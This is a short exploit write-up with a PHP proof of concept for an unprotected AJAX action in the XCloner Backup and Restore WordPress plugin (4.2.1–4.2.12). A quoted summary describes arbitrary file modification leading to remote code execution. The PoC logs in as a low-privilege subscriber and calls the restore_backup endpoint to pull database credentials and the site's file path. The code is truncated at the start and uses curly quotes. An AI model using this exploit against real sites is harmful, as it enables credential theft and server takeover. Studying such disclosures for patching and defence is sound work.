XCloner Backup and Restore 4.2.1 - 4.2.12 - Unprotected AJAX Action

"This flaw gave authenticated attackers, with subscriber-level or above capabilities, the ability to modify arbitrary files, including PHP files. Doing so would allow an attacker to achieve remote code execution on a vulnerable site’s server. Alternatively, an attacker could create an exploit chain to obtain a database dump due to the same unprotected AJAX endpoint, amongst other things. "

PoC

This is just one example of what can happen - this will retrieve the site’s DB credentials and full file path. Usage: php poc.php mysite.com subscriber password $wp_user, ‘pwd’ => $wp_pass, ‘rememberme’ => ‘forever’, ‘wp-submit’ => ‘Log+In’, ]); $output = curl_exec($ch); curl_close($ch); // Update Settings $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $wp_url . ‘/wp-admin/admin-ajax.php?action=restore_backup’); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, [ ‘xcloner_action’ => ‘get_current_directory’ ]); $output = curl_exec($ch); curl_close($ch); print_r($output); ?>